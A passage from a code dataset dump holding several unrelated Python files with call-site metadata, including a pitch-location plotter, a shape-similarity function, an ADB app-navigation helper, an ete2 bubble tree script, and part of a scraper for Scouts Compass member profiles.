{}), '(command, diff, self.name, self.entity_id_type)', False, 'from command import Command\n'), ((514, 16, 514, 70), 'command.Command', 'Command', ({(514, 24, 514, 31): 'command', (514, 33, 514, 37): 'diff', (514, 39, 514, 48): 'self.name', (514, 50, 514, 69): 'self.entity_id_type'}, {}), '(command, diff, self.name, self.entity_id_type)', False, 'from command import Command\n'), ((51, 22, 51, 72), 'errors.ConfigError', 'ConfigError', ({(51, 34, 51, 71): "('Error validating %s: %s' % (name, e))"}, {}), "('Error validating %s: %s' % (name, e))", False, 'from errors import ConfigError, ManagerError, IntegrityError\n'), ((114, 22, 116, 34), 'errors.ConfigError', 'ConfigError', ({(115, 20, 116, 33): "('Cannot be a member of non-existent entity type %s' % entity_type)"}, {}), "('Cannot be a member of non-existent entity type %s' % entity_type)", False, 'from errors import ConfigError, ManagerError, IntegrityError\n'), ((409, 20, 409, 74), 'command.Command', 'Command', ({(409, 28, 409, 35): 'command', (409, 37, 409, 41): 'diff', (409, 43, 409, 52): 'self.name', (409, 54, 409, 73): 'self.entity_id_type'}, {}), '(command, diff, self.name, self.entity_id_type)', False, 'from command import Command\n'), ((414, 20, 414, 74), 'command.Command', 'Command', ({(414, 28, 414, 35): 'command', (414, 37, 414, 41): 'diff', (414, 43, 414, 52): 'self.name', (414, 54, 414, 73): 'self.entity_id_type'}, {}), '(command, diff, self.name, self.entity_id_type)', False, 'from command import Command\n'), ((436, 22, 438, 27), 'errors.IntegrityError', 'IntegrityError', ({(437, 20, 438, 26): "('%s cannot contain both memberService and serviceCategory' % name)"}, {}), "('%s cannot contain both memberService and serviceCategory' %\n name)", False, 'from errors import ConfigError, ManagerError, IntegrityError\n')] |
weknowtraining/athena-glue-service-logs | test/test_catalog_manager.py | b7cf77408486f2bfa941b8609617ed47aa3e2d02 | # pylint: skip-file
from athena_glue_service_logs.catalog_manager import BaseCatalogManager
def test_class_init(mocker):
mocker.patch.multiple(BaseCatalogManager, __abstractmethods__=set())
base_catalog = BaseCatalogManager('us-west-2', 'dbname', 'tablename', 's3://somewhere')
assert base_catalog.database_name == 'dbname'
assert base_catalog.s3_location == 's3://somewhere'
assert base_catalog.table_name == 'tablename'
def test_init_with_partitions(mocker):
mocker.patch.multiple(BaseCatalogManager, __abstractmethods__=set())
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.does_database_exist', return_value=True)
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_database')
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_table')
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_partitions')
base_catalog = BaseCatalogManager('us-west-2', 'dbname', 'tablename', 's3://somewhere')
base_catalog.initialize_with_partitions(['a', 'b', 'c'])
assert BaseCatalogManager.create_database.call_count == 0
BaseCatalogManager.create_table.assert_called_once()
BaseCatalogManager.create_partitions.assert_called_once_with(partition_list=['a', 'b', 'c'])
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.does_database_exist', return_value=False)
base_catalog.initialize_with_partitions(['a', 'b', 'c'])
assert BaseCatalogManager.create_database.call_count == 1
| [((8, 19, 8, 91), 'athena_glue_service_logs.catalog_manager.BaseCatalogManager', 'BaseCatalogManager', ({(8, 38, 8, 49): '"""us-west-2"""', (8, 51, 8, 59): '"""dbname"""', (8, 61, 8, 72): '"""tablename"""', (8, 74, 8, 90): '"""s3://somewhere"""'}, {}), "('us-west-2', 'dbname', 'tablename', 's3://somewhere')", False, 'from athena_glue_service_logs.catalog_manager import BaseCatalogManager\n'), ((21, 19, 21, 91), 'athena_glue_service_logs.catalog_manager.BaseCatalogManager', 'BaseCatalogManager', ({(21, 38, 21, 49): '"""us-west-2"""', (21, 51, 21, 59): '"""dbname"""', (21, 61, 21, 72): '"""tablename"""', (21, 74, 21, 90): '"""s3://somewhere"""'}, {}), "('us-west-2', 'dbname', 'tablename', 's3://somewhere')", False, 'from athena_glue_service_logs.catalog_manager import BaseCatalogManager\n'), ((25, 4, 25, 56), 'athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_table.assert_called_once', 'BaseCatalogManager.create_table.assert_called_once', ({}, {}), '()', False, 'from athena_glue_service_logs.catalog_manager import BaseCatalogManager\n'), ((26, 4, 26, 96), 'athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_partitions.assert_called_once_with', 'BaseCatalogManager.create_partitions.assert_called_once_with', (), '', False, 'from athena_glue_service_logs.catalog_manager import BaseCatalogManager\n')] |
fiddlerwoaroof/sandbox | unsorted/pythonsnippets_0013.py | 652acaf710a8b60f005769bde317e7bbf548cc2b | from twisted.internet import reactor
from twisted.internet.protocol import Factory
factory = Factory()  # placeholder; the original snippet assumes `factory` is defined elsewhere
reactor.listenTCP(8789, factory)
reactor.run() | [((2, 0, 2, 32), 'twisted.internet.reactor.listenTCP', 'reactor.listenTCP', ({(2, 18, 2, 22): '(8789)', (2, 24, 2, 31): 'factory'}, {}), '(8789, factory)', False, 'from twisted.internet import reactor\n'), ((3, 0, 3, 13), 'twisted.internet.reactor.run', 'reactor.run', ({}, {}), '()', False, 'from twisted.internet import reactor\n')] |
SHUcream00/MLBPitchVisual | __main__.py | a3092cef7cbd4e73f8d0010dd62811df6cc36cac | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
def visualize(dataframe, balltype):
df = dataframe
#Filter by balltype
res = df[df["pitch_type"] == balltype]
#Group by results
groups = res.groupby("description")
for name, group in groups:
if name == "miss":
plt.plot(group["plate_x"], group["plate_z"], marker="o", linestyle="", color="none", ms = 3, mec="#9A9A9A", label=name)
else:
plt.plot(group["plate_x"], group["plate_z"], marker="o", linestyle="", color="none", ms = 3, mec="#03A77F", label=name)
#Fixing the viewpoint of the plot
axes = plt.gca()
axes.set_xlim([-2.50,2.50])
axes.set_ylim([0.00,5.00])
#Setting strike zone
sz_top_avg = res["sz_top"].mean()
sz_bottom_avg = res["sz_bot"].mean()
sz_left = -0.85
sz_right = 0.85
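    # Horizontal zone bounds in feet from the centre of home plate; +/-0.85 ft is roughly
    # the plate half-width (~0.71 ft) plus a ball radius.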
#Drawing strike zone
plt.plot((sz_left, sz_right), (sz_top_avg, sz_top_avg), 'k-')
plt.plot((sz_left, sz_right), (sz_bottom_avg, sz_bottom_avg), 'k-')
plt.plot((sz_left, sz_left), (sz_top_avg, sz_bottom_avg), 'k-')
plt.plot((sz_right, sz_right), (sz_top_avg, sz_bottom_avg), 'k-')
#Setting labels
plt.xlabel("Horizontal Location")
plt.ylabel("Vertical Location")
plt.title(f"{player_name} 2018\n {ballname_dict.get(balltype, balltype)}")
plt.legend()
plt.show()
#Setting up Name and CSV location
player_name = "Put player name"
file_src = "Put target csv"
raw = pd.read_csv(file_src)
df = pd.DataFrame(raw)
#For filtering cases
replace_dict = {"description": {"hit_into_play_no_out": "contact", "hit_into_play": "contact", "hit_into_play_score": "contact", "swinging_strike": "miss", "swinging_strike_blocked": "miss"}}
ballname_dict = {"FF": "4-Seam Fastball", "CH": "Changeup", "CU": "Curveball", "SL": "Slider", "FT": "2-Seam Fastball", "AB": "Automatic Ball",
"AS": "Automatic Strike", "EP": "Eephus", "FC": "Cutter", "FO": "Forkball", "FS": "Splitter", "GY": "Gyroball", "IN": "Intentional Ball",
"KC": "Knuckle Curve", "NP": "No Pitch", "PO": "Pitchout", "SC": "Screwball", "SI": "Sinker", "UN": "Unknown"}
df = df.replace(replace_dict)
df = df[df["description"].isin(["contact", "miss"])]
for i in df["pitch_type"].unique():
visualize(df, i)
| [((50, 6, 50, 27), 'pandas.read_csv', 'pd.read_csv', ({(50, 18, 50, 26): 'file_src'}, {}), '(file_src)', True, 'import pandas as pd\n'), ((51, 5, 51, 22), 'pandas.DataFrame', 'pd.DataFrame', ({(51, 18, 51, 21): 'raw'}, {}), '(raw)', True, 'import pandas as pd\n'), ((21, 11, 21, 20), 'matplotlib.pyplot.gca', 'plt.gca', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((32, 4, 32, 65), 'matplotlib.pyplot.plot', 'plt.plot', ({(32, 13, 32, 32): '(sz_left, sz_right)', (32, 34, 32, 58): '(sz_top_avg, sz_top_avg)', (32, 60, 32, 64): '"""k-"""'}, {}), "((sz_left, sz_right), (sz_top_avg, sz_top_avg), 'k-')", True, 'import matplotlib.pyplot as plt\n'), ((33, 4, 33, 71), 'matplotlib.pyplot.plot', 'plt.plot', ({(33, 13, 33, 32): '(sz_left, sz_right)', (33, 34, 33, 64): '(sz_bottom_avg, sz_bottom_avg)', (33, 66, 33, 70): '"""k-"""'}, {}), "((sz_left, sz_right), (sz_bottom_avg, sz_bottom_avg), 'k-')", True, 'import matplotlib.pyplot as plt\n'), ((34, 4, 34, 67), 'matplotlib.pyplot.plot', 'plt.plot', ({(34, 13, 34, 31): '(sz_left, sz_left)', (34, 33, 34, 60): '(sz_top_avg, sz_bottom_avg)', (34, 62, 34, 66): '"""k-"""'}, {}), "((sz_left, sz_left), (sz_top_avg, sz_bottom_avg), 'k-')", True, 'import matplotlib.pyplot as plt\n'), ((35, 4, 35, 69), 'matplotlib.pyplot.plot', 'plt.plot', ({(35, 13, 35, 33): '(sz_right, sz_right)', (35, 35, 35, 62): '(sz_top_avg, sz_bottom_avg)', (35, 64, 35, 68): '"""k-"""'}, {}), "((sz_right, sz_right), (sz_top_avg, sz_bottom_avg), 'k-')", True, 'import matplotlib.pyplot as plt\n'), ((38, 4, 38, 37), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(38, 15, 38, 36): '"""Horizontal Location"""'}, {}), "('Horizontal Location')", True, 'import matplotlib.pyplot as plt\n'), ((39, 4, 39, 35), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(39, 15, 39, 34): '"""Vertical Location"""'}, {}), "('Vertical Location')", True, 'import matplotlib.pyplot as plt\n'), ((42, 4, 42, 16), 'matplotlib.pyplot.legend', 'plt.legend', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((43, 4, 43, 14), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((15, 12, 15, 131), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((17, 12, 17, 131), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n')] |
Toonwire/infancy_eye_tracking | shape_similarity.py | 7b96a9d832f60f83fd5098ada2117ab1d0f56fed | # -*- coding: utf-8 -*-
"""
Created on Sat May 25 13:17:49 2019
@author: Toonw
"""
import numpy as np
def vlen(a):
return (a[0]**2 + a[1]**2)**0.5
def add(v1,v2):
return (v1[0]+v2[0], v1[1]+v2[1])
def sub(v1,v2):
return (v1[0]-v2[0], v1[1]-v2[1])
def unit_vector(v):
vu = v / np.linalg.norm(v)
return (vu[0], vu[1])
def angle_between(v1, v2):
angle = np.arccos(np.dot(v1,v2)/(vlen(v1)*vlen(v2)))
return angle
# Similarity measure of article
## https://pdfs.semanticscholar.org/60b5/aca20ba34d424f4236359bd5e6aa30487682.pdf
def sim_measure(A, B): # similarity between two shapes A and B
# print(A)
# print(B)
return 1 - (sum([(vlen(unit_vector(a))+vlen(unit_vector(b)))*angle_between(a,b) for a,b in zip(A,B)]))/(np.pi*(len(A)+len(B))) | [((21, 14, 21, 31), 'numpy.linalg.norm', 'np.linalg.norm', ({(21, 29, 21, 30): 'v'}, {}), '(v)', True, 'import numpy as np\n'), ((25, 22, 25, 35), 'numpy.dot', 'np.dot', ({(25, 29, 25, 31): 'v1', (25, 32, 25, 34): 'v2'}, {}), '(v1, v2)', True, 'import numpy as np\n')] |
aldwyn/effigia | apps/chats/apps.py | eb456656949bf68934530bbec9c15ebc6d0236b8 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class ChatsConfig(AppConfig):
name = 'apps.chats'
def ready(self):
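        # Register every model in this app with django-activity-stream's registry so
        # their instances can take part in activity streams (as actors, targets, etc.).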
from actstream import registry
registry.register(*self.get_models())
| [] |
JayJJChen/LoveXueXiQiangGuo | utils/ghost.py | 648a38cd73d1eb7ed7267721f1a23c90afb0daee | import os
import time
from utils.eye import Eye
from utils.finger import Finger
class Ghost:
"""class to navigate the app, with Eye and Finger"""
def __init__(self, adb_path, temp_path, sleep_sec=2):
self.eye = Eye(adb_path, temp_path)
self.finger = Finger(adb_path, sleep_sec=sleep_sec)
def to_main(self):
"""back to main page, doesn't support back from exam"""
num_attempts = 0
max_try = 10
while not self._in_main():
if self._in_exam():
self._exit_exam()
else:
self.finger.back()
num_attempts += 1
if num_attempts >= max_try: # failsafe
input("I'm lost! Please help me go to main page! Hit Enter to continue")
def to_score(self):
"""click the score from main page"""
self._bottom_tab(2)
self._goto("score")
def to_exam_root(self):
"""go to the exam page root from main page"""
self._bottom_tab(4)
self._goto("exam_icon")
def _exit_exam(self):
"""exit during exam to main"""
self.finger.back()
self._goto("exit_exam")
self.finger.back()
def swipe_up(self):
self.finger.swipe(500, 1000, 500, 500)
def swipe_down(self):
self.finger.swipe(500, 500, 500, 1000)
def _find_weekly_exam(self):
"""find available weekly exam in weekly exam page"""
path = self._image_path("start_exam")
coords = self.eye.find(path, multi_target=False)
fail_count = 0
while coords is None:
# swipe up if there's no "start_exam"
time.sleep(2)
self.swipe_up()
            coords = self.eye.find(path, multi_target=False)
            fail_count += 1
            if (fail_count > 10) and (coords is None):
                raise RuntimeError("I'm lost! Exiting!")
self.finger.tap(*coords[0])
def _goto(self, img_name):
path = self._image_path(img_name)
coords = self.eye.find(path, multi_target=False)
fail_count = 0
while coords is None:
time.sleep(2)
            coords = self.eye.find(path, multi_target=False)
            fail_count += 1
            if (fail_count > 5) and (coords is None):
                raise RuntimeError("I'm lost! Exiting!")
self.finger.tap(*coords[0])
def _bottom_tab(self, n):
"""
navigate to bottom n_th tab, the screen resolution is 1080x1920
args
n: int, n_th bottom tab
{
            n=0: 消息 (Messages)
            n=1: 关注 (Following)
            n=2: 学习 (Study)
            n=3: 视频学习 (Video Study)
            n=4: 我的 (Me)
}
"""
x = [108 + 108 * 2 * i for i in range(5)]
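        # x evaluates to [108, 324, 540, 756, 972]: with five tabs across a 1080 px wide
        # screen, each tab is 216 px wide and these are the x-coordinates of their centres.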
y = 1850
self.finger.tap(x[n], y)
def _in_exam(self):
image = self.eye.see()
in_exam = self.eye.find(self._image_path("in_exam"), img=image, multi_target=False)
if in_exam is not None:
return True
else:
return False
def _in_main(self):
image = self.eye.see()
main_act = self.eye.find(self._image_path("main_act"), img=image, multi_target=False)
main_inact = self.eye.find(self._image_path("main_inact"), img=image, multi_target=False)
if (main_act is not None) or (main_inact is not None):
return True
else:
return False
@staticmethod
def _image_path(img_name):
path = os.path.join("images", "{}.png".format(img_name))
return path
| [((12, 19, 12, 43), 'utils.eye.Eye', 'Eye', ({(12, 23, 12, 31): 'adb_path', (12, 33, 12, 42): 'temp_path'}, {}), '(adb_path, temp_path)', False, 'from utils.eye import Eye\n'), ((13, 22, 13, 59), 'utils.finger.Finger', 'Finger', (), '', False, 'from utils.finger import Finger\n'), ((58, 12, 58, 25), 'time.sleep', 'time.sleep', ({(58, 23, 58, 24): '(2)'}, {}), '(2)', False, 'import time\n'), ((70, 12, 70, 25), 'time.sleep', 'time.sleep', ({(70, 23, 70, 24): '(2)'}, {}), '(2)', False, 'import time\n')] |
sanja7s/SR_Twitter | src_taxonomy/bubble_tree_map.py | 2eb499c9aa25ba6e9860cd77eac6832890d2c126 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import random
from ete2 import Tree, TreeStyle, NodeStyle, faces, AttrFace, CircleFace, TextFace
def layout(node):
if not node.is_root():
        # Add node name to leaf nodes
#N = AttrFace("name", fsize=14, fgcolor="black")
#faces.add_face_to_node(N, node, 0)
#pass
faces.add_face_to_node(TextFace(node.name), node, 0)
if "weight" in node.features:
# Creates a sphere face whose size is proportional to node's
# feature "weight"
C = CircleFace(radius=node.weight, color="RoyalBlue", style="sphere")
# Let's make the sphere transparent
C.opacity = 0.3
# And place as a float face over the tree
faces.add_face_to_node(C, node, 0, position="float")
def give_tree_layout(t):
# Some random features in all nodes
for n in t.traverse():
n.add_features(weight=n.dist*20)
# Create an empty TreeStyle
ts = TreeStyle()
# Set our custom layout function
ts.layout_fn = layout
# Draw a tree
#ts.mode = "c"
#ts.arc_start = -180
#ts.arc_span = 180
# We will add node names manually
#ts.show_leaf_name = True
# Show branch data
#ts.show_branch_length = True
#ts.show_branch_support = True
return ts
class Tree7s(object):
def __init__(self, lab):
self.root = Node7s(lab, 0, 0)
def find_root(self):
return self.root
class Node7s(object):
def __init__(self, data, score, lev):
self.data = data
self.score = score
self.level = lev
self.children = []
def add_child(self, lab, score, lev):
if int(self.level) == int(lev-1):
nn = self.find_child(lab)
if nn == None:
self.children.append(Node7s(lab, score, lev))
else:
nn.increase_score(score)
else:
print "Trying to add to a wrong level?", lev-1, self.level, lab, self.data
def find_child(self, label):
for el in self.children:
if el.data == label:
return el
return None
def increase_score(self, sc):
self.score += sc
def print_me(self):
print self.data, self.score
for el in self.children:
el.print_me()
def create_newick(self):
if self.children == []:
return str(self.data + ":" + str(self.score))
newick = "("
for el in self.children:
newick += el.create_newick() + ","
newick = newick[:-1]
if self.level == 0:
newick += ")" + str(self.data) + "."
else:
newick += ")" + str(self.data) + ":" + str(self.score)
return newick
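        # Example: a root node with a single child C (score 1.0) holding leaves A and B
        # (score 0.5 each) serialises to "((A:0.5,B:0.5)C:1.0)Root."; test_data() appends
        # ";" before handing the string to ete2's Tree().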
def test_data():
D = {'taxonomy': [{"score": "0.718868", "label": "/art and entertainment/movies and tv/movies"},\
{"confident": "no", "score": "0.304296", "label": "/pets/cats"},\
{"score": "0.718868", "label": "/art and entertainment/movies and tv/series"}]}
t7s = Tree7s("ThingAdamsFamily")
for el in D["taxonomy"]:
#n = t7s
n = t7s.find_root()
taxonomy_tree = el["label"]
taxonomy_tree = taxonomy_tree.split("/")
taxonomy_tree.pop(0)
levels = len(taxonomy_tree)
score = float(el["score"])
print levels, taxonomy_tree, score
for i in range(levels):
label = taxonomy_tree[i]
#if n.find_child(label) == None:
n.add_child(label, score, i+1)
n = n.find_child(label)
t7s.find_root().print_me()
t = t7s.find_root()
S = t.create_newick() + ";"
print S
#S = "(((A,B,(C.,D)E)F,(S,N)K)R);"
#T = Tree(S, format=8)
T = Tree(S, format=1)
for node in T.traverse("postorder"):
# Do some analysis on node
print node.name
for node in T.traverse("levelorder"):
# Do some analysis on node
print node.name
#for branch in T
return T
if __name__ == "__main__":
#t.render("bubble_map.png", w=600, dpi=300, tree_style=ts)
#t.show(tree_style=ts)
t = test_data()
ts = give_tree_layout(t)
t.show(tree_style=ts)
t.render("bubble_map.png", w=600, dpi=300, tree_style=ts) | [] |
MrNoScript/compass-interface-core | compass/core/_scrapers/member.py | 8c945ef36f7bee396bd5a744404eaa88d280a845 | from __future__ import annotations
import re
import time
from typing import get_args, Literal, TYPE_CHECKING, Union
from lxml import html
from compass.core.interface_base import InterfaceBase
from compass.core.logger import logger
from compass.core.schemas import member as schema
from compass.core.settings import Settings
from compass.core.utility import cast
from compass.core.utility import maybe_int
from compass.core.utility import parse
if TYPE_CHECKING:
import requests
MEMBER_PROFILE_TAB_TYPES = Literal[
"Personal", "Roles", "Permits", "Training", "Awards", "Emergency", "Comms", "Visibility", "Disclosures"
]
class PeopleScraper(InterfaceBase):
"""Class directly interfaces with Compass operations to extract member data.
Compass's MemberProfile.aspx has 13 tabs:
1. Personal Details (No Key)
2. Your Children (Page=CHILD)
3. Roles (Page=ROLES)
4. Permits (Page=PERMITS)
5. Training (Page=TRAINING)
6. Awards (Page=AWARDS)
7. Youth Badges/Awards (Page=BADGES)
8. Event Invitations (Page=EVENTS)
9. Emergency Details (Page=EMERGENCY)
10. Communications (Page=COMMS)
11. Visibility (Page=VISIBILITY)
12. Disclosures (Page=DISCLOSURES)
13. Parents/Guardians (Page=PARENT)
Of these, tabs 2, 7, 8, 13 are disabled functionality.
Tab 11 (Visibility) is only shown on the members' own profile.
    For member-adjacent operations there are additional endpoints:
- /Popups/Profile/AssignNewRole.aspx
- /Popups/Maint/NewPermit.aspx
- /Popups/Profile/EditProfile.aspx
Currently we only use one of these endpoints (AssignNewRole), as all
other data we need can be found from the MemberProfile tabs.
All functions in the class output native types.
"""
def __init__(self, session: requests.Session, validate: bool = False):
"""Constructor for PeopleScraper.
takes an initialised Session object from Logon
"""
super().__init__(session)
self.validate = validate
def _get_member_profile_tab(self, membership_num: int, profile_tab: MEMBER_PROFILE_TAB_TYPES) -> bytes:
"""Returns data from a given tab in MemberProfile for a given member.
Args:
membership_num: Membership Number to use
profile_tab: Tab requested from Compass
Returns:
            The raw HTML of the requested tab, as bytes.
Raises:
ValueError: The given profile_tab value is illegal
Todo:
Other possible exceptions? i.e. from Requests
"""
profile_tab = profile_tab.upper()
tabs = tuple(tab.upper() for tab in get_args(MEMBER_PROFILE_TAB_TYPES))
url = f"{Settings.base_url}/MemberProfile.aspx?CN={membership_num}"
if profile_tab == "PERSONAL": # Personal tab has no key so is a special case
response = self._get(url)
elif profile_tab in tabs:
url += f"&Page={profile_tab}&TAB"
response = self._get(url)
else:
raise ValueError(f"Specified member profile tab {profile_tab} is invalid. Allowed values are {tabs}")
return response.content
def get_personal_tab(self, membership_num: int) -> Union[schema.MemberDetails, dict]:
"""Returns data from Personal Details tab for a given member.
Args:
membership_num: Membership Number to use
Returns:
A dict mapping keys to the corresponding data from the personal
data tab.
For example:
{'membership_number': ...,
'forenames': '...',
'surname': '...',
'main_phone': '...',
'main_email': '...',
'name': '...',
'known_as': '...',
'join_date': datetime.datetime(...),
'sex': '...',
'birth_date': datetime.datetime(...),
'nationality': '...',
'ethnicity': '...',
'religion': '...',
'occupation': '...',
'address': '...'}
Keys will be present only if valid data could be extracted and
parsed from Compass.
Raises:
PermissionError:
Access to the member is not given by the current authentication
Todo:
Other possible exceptions? i.e. from Requests
"""
response = self._get_member_profile_tab(membership_num, "Personal")
tree = html.fromstring(response)
if tree.forms[0].action == "./ScoutsPortal.aspx?Invalid=AccessCN":
raise PermissionError(f"You do not have permission to the details of {membership_num}")
details = dict()
# ### Extractors
# ## Core:
details["membership_number"] = membership_num
# Name(s)
names = tree.xpath("//title//text()")[0].strip().split(" ")[3:]
details["forenames"] = names[0]
details["surname"] = " ".join(names[1:])
# Main Phone
details["main_phone"] = tree.xpath('string(//*[text()="Phone"]/../../../td[3])')
# Main Email
details["main_email"] = tree.xpath('string(//*[text()="Email"]/../../../td[3])')
# ## Core - Positional:
# Full Name
details["name"] = tree.xpath("string(//*[@id='divProfile0']//tr[1]/td[2]/label)")
# Known As
details["known_as"] = tree.xpath("string(//*[@id='divProfile0']//tr[2]/td[2]/label)")
# Join Date # TODO Unknown - take date from earliest role?
join_date_str = tree.xpath("string(//*[@id='divProfile0']//tr[4]/td[2]/label)")
details["join_date"] = parse(join_date_str) if join_date_str != "Unknown" else None
# ## Position Varies, only if authorised:
# Gender
details["sex"] = tree.xpath("string(//*[@id='divProfile0']//*[text()='Gender:']/../../td[2])")
# DOB
details["birth_date"] = parse(tree.xpath("string(//*[@id='divProfile0']//*[text()='Date of Birth:']/../../td[2])"))
# Nationality
details["nationality"] = tree.xpath("string(//*[@id='divProfile0']//*[text()='Nationality:']/../../td[2])")
# Ethnicity
details["ethnicity"] = tree.xpath("normalize-space(//*[@id='divProfile0']//*[text()='Ethnicity:']/../../td[2])")
# Religion
details["religion"] = tree.xpath("normalize-space(//*[@id='divProfile0']//*[text()='Religion/Faith:']/../../td[2])")
# Occupation
details["occupation"] = tree.xpath("normalize-space(//*[@id='divProfile0']//*[text()='Occupation:']/../../td[2])")
# Address
details["address"] = tree.xpath('string(//*[text()="Address"]/../../../td[3])')
# Filter out keys with no value.
details = {k: v for k, v in details.items() if v}
if self.validate:
return schema.MemberDetails.parse_obj(details)
else:
return details
def get_roles_tab(self, membership_num: int, keep_non_volunteer_roles: bool = False) -> Union[schema.MemberRolesDict, dict]:
"""Returns data from Roles tab for a given member.
Sanitises the data to a common format, and removes Occasional Helper, Network, and PVG roles by default.
Args:
membership_num: Membership Number to use
keep_non_volunteer_roles: Keep Helper (OH/PVG) & Network roles?
Returns:
A dict of dicts mapping keys to the corresponding data from the roles tab.
E.g.:
{1234578:
{'role_number': 1234578,
'membership_number': ...,
'role_title': '...',
'role_class': '...',
'role_type': '...',
'location_id': ...,
'location_name': '...',
'role_start_date': datetime.datetime(...),
'role_end': datetime.datetime(...),
'role_status': '...'},
{...}
}
Keys will always be present.
Raises:
PermissionError:
Access to the member is not given by the current authentication
Todo:
Other possible exceptions? i.e. from Requests
primary_role
"""
logger.debug(f"getting roles tab for member number: {membership_num}")
response = self._get_member_profile_tab(membership_num, "Roles")
tree = html.fromstring(response)
if tree.forms[0].action == "./ScoutsPortal.aspx?Invalid=AccessCN":
raise PermissionError(f"You do not have permission to the details of {membership_num}")
roles_data = {}
rows = tree.xpath("//tbody/tr")
for row in rows:
# Get children (cells in row)
cells = list(row) # filter out empty elements
# If current role allows selection of role for editing, remove tickbox
if any(el.tag == "input" for el in cells[0]):
cells.pop(0)
role_number = int(row.get("data-pk"))
status_with_review = cells[5].text_content().strip()
if status_with_review.startswith("Full Review Due "):
role_status = "Full"
review_date = parse(status_with_review.removeprefix("Full Review Due "))
else:
role_status = status_with_review
review_date = None
role_details = dict(
role_number=role_number,
membership_number=membership_num,
role_title=cells[0].text_content().strip(),
role_class=cells[1].text_content().strip(),
# role_type only visible if access to System Admin tab
role_type=[*row.xpath("./td[1]/*/@title"), None][0],
# location_id only visible if role is in hierarchy AND location still exists
location_id=cells[2][0].get("data-ng_id"),
location_name=cells[2].text_content().strip(),
role_start=parse(cells[3].text_content().strip()),
role_end=parse(cells[4].text_content().strip()),
role_status=role_status,
review_date=review_date,
can_view_details=any("VIEWROLE" in el.get("class") for el in cells[6]),
)
# Remove OHs etc from list
if not keep_non_volunteer_roles and (
"helper" in role_details["role_class"].lower()
or {role_details["role_title"].lower()} <= {"occasional helper", "pvg", "network member"}
):
continue
roles_data[role_number] = role_details
if self.validate:
return schema.MemberRolesDict.parse_obj(roles_data)
else:
return roles_data
def get_training_tab(
self, membership_num: int, ongoing_only: bool = False
) -> Union[schema.MemberTrainingTab, schema.MemberMOGLList, dict]:
"""Returns data from Training tab for a given member.
Args:
membership_num: Membership Number to use
ongoing_only: Return a dataframe of role training & OGL info? Otherwise returns all data
Returns:
A dict mapping keys to the corresponding data from the training
tab.
E.g.:
{'roles': {1234567: {'role_number': 1234567,
'role_title': '...',
'role_start': datetime.datetime(...),
'role_status': '...',
'location': '...',
'ta_data': '...',
'ta_number': '...',
'ta_name': '...',
'completion': '...',
'wood_badge_number': '...'},
...},
'plps': {1234567: [{'pk': 6142511,
'module_id': ...,
'code': '...',
'name': '...',
'learning_required': False,
'learning_method': '...',
'learning_completed': '...',
'validated_membership_number': '...',
'validated_name': '...'},
...],
...},
'mandatory': {'GDPR':
{'name': 'GDPR',
'completed_date': datetime.datetime(...)},
...}}
Keys will always be present.
Todo:
Other possible exceptions? i.e. from Requests
"""
# pylint: disable=too-many-locals,too-many-statements
response = self._get_member_profile_tab(membership_num, "Training")
tree = html.fromstring(response)
rows = tree.xpath("//table[@id='tbl_p5_TrainModules']/tr")
training_plps = {}
training_roles = {}
for row in rows:
# Personal Learning Plan (PLP) data
if "trPLP" in row.classes:
plp = row
plp_table = plp.getchildren()[0].getchildren()[0]
plp_data = []
for module_row in plp_table:
if module_row.get("class") != "msTR trMTMN":
continue
module_data = {}
child_nodes = list(module_row)
module_data["pk"] = int(module_row.get("data-pk"))
module_data["module_id"] = int(child_nodes[0].get("id")[4:])
matches = re.match(r"^([A-Z0-9]+) - (.+)$", child_nodes[0].text_content()).groups()
if matches:
module_data["code"] = str(matches[0])
module_data["name"] = matches[1]
# Skip processing if we only want ongoing learning data and the module is not GDPR.
if ongoing_only and "gdpr" not in module_data["code"].lower():
continue
learning_required = child_nodes[1].text_content().lower()
module_data["learning_required"] = "yes" in learning_required if learning_required else None
module_data["learning_method"] = child_nodes[2].text_content() or None
module_data["learning_completed"] = parse(child_nodes[3].text_content())
module_data["learning_date"] = parse(child_nodes[3].text_content())
validated_by_string = child_nodes[4].text_content()
if validated_by_string:
# Add empty item to prevent IndexError
validated_by_data = validated_by_string.split(" ", maxsplit=1) + [""]
module_data["validated_membership_number"] = maybe_int(validated_by_data[0])
module_data["validated_name"] = validated_by_data[1]
module_data["validated_date"] = parse(child_nodes[5].text_content())
plp_data.append(module_data)
training_plps[int(plp_table.get("data-pk"))] = plp_data
# Role data
if "msTR" in row.classes:
role = row
child_nodes = list(role)
info = {} # NoQA
info["role_number"] = int(role.xpath("./@data-ng_mrn")[0])
info["role_title"] = child_nodes[0].text_content()
info["role_start"] = parse(child_nodes[1].text_content())
status_with_review = child_nodes[2].text_content()
if status_with_review.startswith("Full (Review Due: "):
info["role_status"] = "Full"
info["review_date"] = parse(status_with_review.removeprefix("Full (Review Due: ").removesuffix(")"))
else:
info["role_status"] = status_with_review
info["review_date"] = None
info["location"] = child_nodes[3].text_content()
training_advisor_string = child_nodes[4].text_content()
if training_advisor_string:
info["ta_data"] = training_advisor_string
# Add empty item to prevent IndexError
training_advisor_data = training_advisor_string.split(" ", maxsplit=1) + [""]
info["ta_number"] = maybe_int(training_advisor_data[0])
info["ta_name"] = training_advisor_data[1]
completion_string = child_nodes[5].text_content()
if completion_string:
info["completion"] = completion_string
parts = completion_string.split(":")
info["completion_type"] = parts[0].strip()
info["completion_date"] = parse(parts[1].strip())
assert len(parts) <= 2, parts[2:]
